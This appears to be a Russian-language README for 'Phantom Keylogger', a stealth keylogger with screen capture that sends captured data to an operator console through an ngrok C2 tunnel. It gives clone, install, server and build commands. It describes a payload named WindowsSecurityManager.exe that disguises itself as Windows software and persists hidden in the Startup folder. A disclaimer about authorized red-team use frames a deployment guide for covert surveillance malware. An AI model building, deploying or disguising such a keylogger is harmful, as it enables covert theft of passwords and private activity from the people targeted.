
Phantom Keylogger — это продвинутая система со скрытым режимом работы для перехвата нажатий клавиш и сбора визуальной информации.
Phantom Keylogger — это продвинутая система сбора данных о нажатиях клавиш и визуальной разведки со скрытным режимом работы. Созданный с операционной безопасностью в качестве главного приоритета, этот инструмент обеспечивает возможности постоянного наблюдения, сохраняя минимальный след на целевых системах во время авторизованных red team-операций.
Разрешенные случаи использования:
- Авторизованные операции по тестированию на проникновение
- Red team-упражнения с письменными правилами взаимодействия (Rules of Engagement)
- Исследования безопасности в контролируемых средах
- Проверка защитных мер безопасности
Запрещенные операции:
- Несанкционированная слежка
- Незаконное вторжение или кража данных
- Нарушение личной конфиденциальности
- Любые неавторизованные наступательные операции
Операторы несут полную юридическую ответственность за надлежащее развертывание
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
Результат: dist/WindowsSecurityManager.exe
Методы доставки:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
Папка автозагрузки: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Легко доступна, если ввести shell:startup в диалоговом окне (WIN+r)
Имя файла: WindowsSecurityManager.exe
Атрибуты: скрытый системный файл